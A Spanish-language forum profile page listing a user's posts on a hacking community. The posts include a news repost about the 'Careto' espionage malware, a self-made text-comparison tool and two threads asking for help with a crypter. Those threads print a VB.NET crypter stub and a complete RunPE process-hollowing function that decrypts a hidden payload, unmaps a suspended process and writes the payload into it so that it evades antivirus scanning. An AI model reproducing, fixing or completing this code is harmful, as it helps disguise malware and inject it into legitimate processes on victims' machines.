Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - Cyb3r2876

Páginas: [1]
1
Off Topic / El 'Careto' malware más avanzado hasta la fecha
« en: Febrero 11, 2014, 12:25:41 pm »


El equipo de investigación de seguridad de Kaspersky Lab ha revelado el 'Careto' o 'The Mask', uno de los programas de espionaje informático más avanzados que han existido.
El 'Careto' fue usado para recopilar documentos, claves criptográficas, configuraciones de VPN (red privada virtual), las claves de firma digital de Adobe, e incluso permitía obtener el control completo de las computadoras, aseguran los especialistas de Kaspersky, que revelaron el hallazgo durante la Cumbre de Analistas de Seguridad en Punta Cana, República Dominicana, patrocinada por Kaspersky Lab.

Los objetivos del malware han sido agencias gubernamentales, embajadas, empresas gasísticas y energéticas, instituciones de investigación y activistas prominentes. En total el programa ha atacado al menos a 380 objetivos en más de 20 países, la mayoría en Marruecos y Brasil, señaló Kaspersky. Para infectar los ordenadores se usaban correos electrónicos falsos de periódicos famosos como 'The Washington Post' o 'The Guardian', que contenían enlaces a las páginas con el malware. El programa afectaba a las máquinas que operaban tanto con Windows como con otros sistemas operativos, y posiblemente dispositivos móviles, señalan los expertos.
"Son los mejores"
El programa fue creado en 2007 y funcionó sin ser detectado hasta este año. "En estos momentos, todos los servidores de dirección y control de 'Careto' están desactivados", explicaron los especialistas de Kaspersky.

"Se trata de un grupo élite de Amenaza Persistente Avanzada, uno de los mejores que he visto", dijo Costin Raiu, de Kaspersky Lab. "Antes pensaba que el grupo detrás del virus Flame era el más potente. Pero esta gente es aún mejor".

El 'Careto' podría haber sido elaborado por un país de habla hispana, creen los especialistas, ya que en su código hay partes en castellano. En concreto, una de sus 'puertas traseras', o 'backdoors' (secuencias dentro del código de programación que permiten evitar los sistemas de seguridad) se llama 'Careto'. Esto lo convierte en el primer programa de espionaje informático avanzado 'hispanohablante', señala Raiu.


Texto completo en: http://actualidad.rt.com/actualidad/view/119573-malware-mas-avanzado-espanol-kaspersky-detectar

2
Dudas y pedidos generales / Alguien ha hecho correr RunPE en vb.net???
« en: Febrero 03, 2014, 05:55:50 pm »
Pues eso estoy harto de probar runpes en vb.net y no me rula con ninguno. Me sale error "No se encuentra el ordinal 345 en la biblioteca de vínculos dinámicos COMCTL32.dll"  :o :o :o :o

3
C# - VB.NET / Re:Simple Generador Deface - Djtrueno
« en: Febrero 03, 2014, 05:52:51 pm »
Wena bro la tengo que probar, aunque no se nada de deface..

4
Dudas y pedidos generales / Re:Ayuda al inyectar en runpe
« en: Enero 19, 2014, 08:13:02 pm »
bueno al fin he conseguido eso. se me olvido decir que es en vb.net

me queda probar que realmente se ejecuta como debe en la memoria, pero eso es otro tema , así que se puede dar este por solucionado..

salu2

5
Dudas y pedidos generales / [SOLUCIONADO] Ayuda al inyectar en runpe
« en: Enero 19, 2014, 07:16:29 am »
Wenas gente, llevo meses liado con un crypter y todo va bien pero cuando lo paso a runtime se estropea el exe, en hexa se ve la cabecera y todo más o menos bien pero no corre el programa cryptado.

Código: [Seleccionar]
Dim archivo As String
        Dim archivodesplit() As String
        Dim archivocortado As String
        Dim archivofinal() As Byte

        FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        archivo = Space(LOF(1))
        FileGet(1, archivo)
        FileClose(1)

        archivodesplit = Split(archivo, separador)
        archivocortado = jkhnñjharejfgfdjkhituytih85j4kjn45(archivodesplit(1), "camuflate") 'rc4

        archivofinal = System.Text.Encoding.Default.GetBytes(archivocortado)
        Call estolalia.RunPE.InjectPE(archivofinal, archivo)   'aquí no estoy seguro que archivo sea el argumento correcto pero he probado más

        Me.Close()


Y esta es la función inject del runpe:
Código: [Seleccionar]
Public Shared Function InjectPE(ByVal bytes As Byte(), ByVal surrogateProcess As String) As Boolean
            Try
                Dim procAttr As IntPtr = IntPtr.Zero
                Dim processInfo As IntPtr() = New IntPtr(3) {}
                Dim startupInfo As Byte() = New Byte(67) {}

                Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
                Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
                Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))

                If CreateProcess(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _
                procAttr, Nothing, startupInfo, processInfo) Then
                    Dim ctxt As UInteger() = New UInteger(178) {}
                    ctxt(0) = &H10002
                    If GetThreadContext(processInfo(1), ctxt) Then
                        Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)

                        Dim buffer__1 As IntPtr = IntPtr.Zero
                        Dim bufferSize As New IntPtr(4)

                        Dim numRead As IntPtr = IntPtr.Zero

                        If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
                            Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
                            Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
                            Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)

                            Dim lpNumberOfBytesWritten As Integer

                            WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                            Dim num5 As Integer = num - 1
                            For i As Integer = 0 To num5
                                Dim dst As Integer() = New Integer(9) {}
                                Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
                                Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                                Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)

                                size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                                addr = New IntPtr(buffer2.Length)

                                WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                            Next
                            size = New IntPtr(ctxt(&H29) + 8L)
                            addr = New IntPtr(4)

                            WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                            ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
                            SetThreadContext(processInfo(1), ctxt)
                        End If
                    End If
                    ResumeThread(processInfo(1))
                End If
            Catch
                Return False
            End Try
            Return True
        End Function


Llevo días (casi enteros... xD) depurando y probando cosas diferentes módulos runpe diferentes argumentos y nada, solo me sale en scantime  T T

6
Off Topic / Assange y los Cryptopunks, charla en RT + PDF Cryptopunks
« en: Enero 11, 2014, 01:20:32 pm »
Buenas les dejo una entrevista de Assange y Cryptopunks más un PDF de Assange.

Como siempre, pueden acceder al contenido desde mi blog

http://desdelamatrix.wordpress.com/cryptopunks/

PD:No es por spam sino por pereza de repetir los artículos en diferentes blogs o foros, simplemnte lo publico en mi blog y dejo la url donde me apetece  ;)

7
C# - VB.NET / [info] Ideas para encriptar ejecutables .net en runtime
« en: Enero 10, 2014, 07:45:51 am »
PDF de nullsecurity sobre encriptar ejecutables en vb.net en modo runtime.

http://www.nullsecurity.net/papers/nullsec-net-crypter.pdf


Creditos: Ideas on advanced runtime Encryption of .NET Executables
by Christian Ammann is distributed
under a
Creative Commons Attribution 3.0 Unported License
. See
http://creativecommons.
org/licenses/by/3.0/
for details.

8
C# - VB.NET / Re:Herramienta Note Tool (.exe)
« en: Enero 02, 2014, 01:19:16 am »
Ya terminé la herramienta, incluye lo que ponie en el post anerior.

Herramienta para tratamiento de texto y visor de imágenes. Con Note Tool puedes:
+ Comparar dos textos, te indica los caracteres iguales, distintos y la diferencia del tamaño del texto.
+ Realizar busquedas dentro del texto
+ Buscar coincidencias dentro del texto.

Portada




Comparador de textos


Búsqueda dentro del texto


Buscar coincidencias


Descarga Note Tool V1.5:  https://mega.co.nz/#!nRYHkQwB!WThfDkGdCCNKnopOFvVK_2nGODJjr1xXGghTWjcCh3M

Y bueno como dije no es gran cosa, pero ayuda un poco con las funciones que tiene, si la prueban comenten y si les es útil pues me alegra. ;D Estoy pensando quitarle los botones y ponerlo en una barra de herramientas pero bueno tengo otras cosas en la cabeza si me animo la actualizo.

Saludos!!



9
C# - VB.NET / Re:Herramienta Note Tool (.exe)
« en: Diciembre 27, 2013, 04:58:30 pm »
Gracias por comentar!  ;D

10
Presentaciones y cumpleaños / Re:Saludos!!
« en: Diciembre 27, 2013, 04:55:16 pm »
Gracias ANTRAX!  ;D

11
C# - VB.NET / Herramienta Note Tool (.exe)
« en: Diciembre 27, 2013, 06:46:34 am »
Saludos, no se si es el lugar correcto pero no vi otro para poner aplicaciones desarrolladas por usuarios y que no son oficial de underc0de, asi que la dejo aquí.

Note tool es una herramienta para tratamiento de texto, la diferencia con el bloc de notas es que puedes comparar dos textos y los caracteres se colorean según sean iguales o diferentes. Es útil cuando estas trabajando sobre un código y vas cambiando cosas si te pierdes y no sabe que cambiastes puedes contrastar los dos códigos con Note Tool. Otra característica es que puedes elegirlo como predeterminado para abrir archivos .txt. También puedes arrastrar archivos para que los abra o pegar textos directamente. También incluye un visor de imágenes.

Note Tool V1.3: V1.5 actualizado, ver en el post de más abajo

Sigo trabajando en ella según mis propias necesidades, en la siguiente actualización se incluirá:
- Una herramienta para seleccionar parte del texto y buscar coincidencias dentro de él; útil para coders..
- Un buscador para buscar dentro del texto.
- Una barra de progreso para cuando se comparan grandes textos (códigos) que indique el progreso ya que ahora parece que se queda colgado, pero no..
- Cambio del color del texto sobrante cuando los tamaños de los textos comparados son distintos


Esta tool la hago simplemente para aprender pero a la vez que aprendo me estoy haciendo una herramienta que me ayude a la hora de analizar y crear códigos. Cualquier idea  será bienvenida.


12
Presentaciones y cumpleaños / Saludos!!
« en: Diciembre 27, 2013, 06:18:14 am »
Bueno gente algunos ya me conocen otros no, y pues nada me presento a la comunidad. Vengo a pasar un buen rato, conocer gente, aprender, enseñar y sobre todo picar códigos  ;D ;D

Pues nada saludos a todos y dejo una humilde herramienta (en la sección correspondiente) en la que estoy trabajando ahora.

Un placer estar en esta comunidad, Underc0de.

Cyb3r2876.


PD: muchos me conocen como cyb3rsapi3n del irc, ya actualizaré el nick para evitar confusiones :D

Páginas: [1]